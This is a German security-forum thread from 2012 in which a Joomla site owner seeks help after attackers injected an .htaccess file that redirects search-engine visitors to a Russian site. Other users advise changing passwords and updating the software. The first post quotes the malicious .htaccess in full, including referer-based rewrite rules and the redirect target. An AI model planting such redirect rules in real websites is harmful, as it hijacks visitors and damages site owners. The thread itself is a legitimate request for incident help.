Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Netzwerk und Hardware (https://www.trojaner-board.de/netzwerk-hardware/)
-   -   google und bing leiten meine Webseite immer noch auf russische Seite um (https://www.trojaner-board.de/122705-google-bing-leiten-webseite-immer-noch-russische-seite-um.html)

andeberg 24.08.2012 08:13
google und bing leiten meine Webseite immer noch auf russische Seite um
 
Liste der Anhänge anzeigen (Anzahl: 1)
Hallo an alle!

Meine Webseite (Joomla 1.5.22) wurde gehackt. Es wurde eine .htaccess im root eingeschleust.

Ruft man die Webseite direkt auf, fällt dies erstmal nicht auf.
Sucht man jedoch in google, bing, ... und sieht sich den Link in der Statusleiste an - scheint noch alles zu passen. Klickt man nun diesen Link an, wird man auf eine russische Seite weitergeleitet.

Ich habe die .htaccess (Datei im Anhang) ersetzt, Seite mit google Webmastertools geprüft - google konnte nichts schadhaftes feststellen.

Allerdings ist jetzt schon viel Zeit vergangen und die Seite leitet immer noch falsch weiter.

Kann mir jemand helfen?
Woran kann das noch liegen?
Muss ich nun nur auf einen erneuten Besuch von google, bing und dergl. warten?
Welche Möglichkeiten habe ich noch?

Und *schäm* wie müsste eine "ordentliche" .htaccess denn genau aussehen?

Vielen Dank für eure Hilfe,
Andi

Code:
                                                                                        <IfModule mod_rewrite.c>                                                                                        RewriteEngine On                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)                                                                                                                RewriteRule ^(.*)$ hxxp://2014-fitnes.ru/milli?5 [R=301,L]                                                                                                                                RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)                                       

RewriteRule ^(.*)$ hxxp://2014-fitnes.ru/milli?5 [R=301,L]                                                                </IfModule>                                                                                        ErrorDocument 500 hxxp://2014-fitnes.ru/milli?5

andeberg 24.08.2012 08:55
Hallo nochmal!

Ich habe nicht locker gelassen und weiter gesucht.
Nun habe ich noch eine .htaccess im root gefunden. Habe den Inhalt gelöscht, wieder ins web gestellt, Rechte 444.

Nun geht die Seite wieder. D.h. wenn ich nun über google oder bing suche lande ich GsD wieder auf meiner Seite.

Thema wäre erledigt - jedoch wie konnte das passieren?
Wie gesagt - ich verwende Joomla 1.5.22 (update wurde schon auf letzte Version gemacht) und natürlich sind auch einige Module im Einsatz.

Vielen Dank für eure Hilfe!!!
Gruß,
Andi

Shadow 24.08.2012 09:01
Hallo andeberg, :hallo:

Was hat dies jetzt mit Mac oder Linux zu tun? Ich verschiebe mal in Netzwerk

Schämen musst du dich eigentlich dafür, dass vermutlich dein Passwort so unsicher war (wenn es dies noch ist, dann aber in Grund und Boden :pfeiff:), dass jemand diese .htaccess einschleusen konnte.
ALLE Passwörter, ALLE Zugänge überprüfen, ändern und durch sichere Passwörter ersetzen.

Ein .htaccess muss nicht vorhanden sein, du kannst aber mit .htaccess-Dateien einiges steuern (wie du gemerkt hast).

Aber es können keine zwei .htaccess gleichzeitig im selben Verzeichnis vorhanden sein, also besteht der Zugang zu deinem Projekt wohl noch immer!
Unternimm gefälligst was!



Je nach dem was dein Webspace wirklich ist, solltest dafür sorgen, dass der Webserver, PHP und Joomla auf einen aktuellen, sicheren Stand kommen und das Projekt ausreichend sicher ist.

andeberg 24.08.2012 09:45
Danke für Deine Antwort!

Angenommen dies würde nicht über FTP hochgeladen.
Kann man soetwas (ich nicht aber eben andere) auch über Module oder Plugins in Joomla machen/hochladen oder verändern?

Und die eine .htaccess war im "html"-ordner (root der Webseite) und die andere war noch eine Ebene davor (also nicht im selben Verzeichnis).

Nochmals Danke,
Andi

Shadow 24.08.2012 09:57
Zitat:
Zitat von andeberg (Beitrag 899982)
Kann man soetwas (ich nicht aber eben andere) auch über Module oder Plugins in Joomla machen/hochladen oder verändern?
Ich kenne mich mit Joomla nicht aus, ich kenne deinen Webserver, deinen Provider nicht, ich kennen den Stand des Vertrages und der Software nicht: Prinzipiell aber kann es möglich sein (ist es möglich), ohne einen dir bekannten FTP-Zugang Daten mit oder ohne FTP auf dem Webserver zu erzeugen oder hochzuladen.

Je nach Vertrag und Beschränkungen, sind aber die weiteren Möglichkeiten nicht oder nur sehr unwahrscheinlich, eventuell nur mit Sicherheitslücken beim Provider, bzw. die der Provider verantworten muss, machbar.
Zitat:
Zitat von andeberg (Beitrag 899982)
Und die eine .htaccess war im "html"-ordner (root der Webseite) und die andere war noch eine Ebene davor (also nicht im selben Verzeichnis).
Okay, dann soweit Entwarnung.

Übrigens: Website != Webseite, und auch "root" (vor allem ohne nähere Beschreibung) ist eigentlich nur das echte Wurzelverzeichnis.

andeberg 25.08.2012 08:30
Vielen Dank für deine Hilfe!

Für mich ist dieses Thema nun abgeschlossen. Ich werde deinen Rat befolgen. Habe auch für Joomla eine Firewall installiert (möchte Zugriffe beobachten) und werde mich mit meinem Provider kurzschließen.

Ev. kann jemand das Thema beenden - ich finden den "Button" dafür nicht ;-)

Thx und Gruß,
Andi

Shadow 25.08.2012 08:48
In der Regel bleiben die Themen bei uns offen, da brauchst du dir keine Gedanken oder Arbeit machen.
:daumenhoc

Lucky 01.09.2012 07:47
Prüfe bitte deine Joomla Installation. Ist sie aktuell?


Alle Zeitangaben in WEZ +1. Es ist jetzt 01:39 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131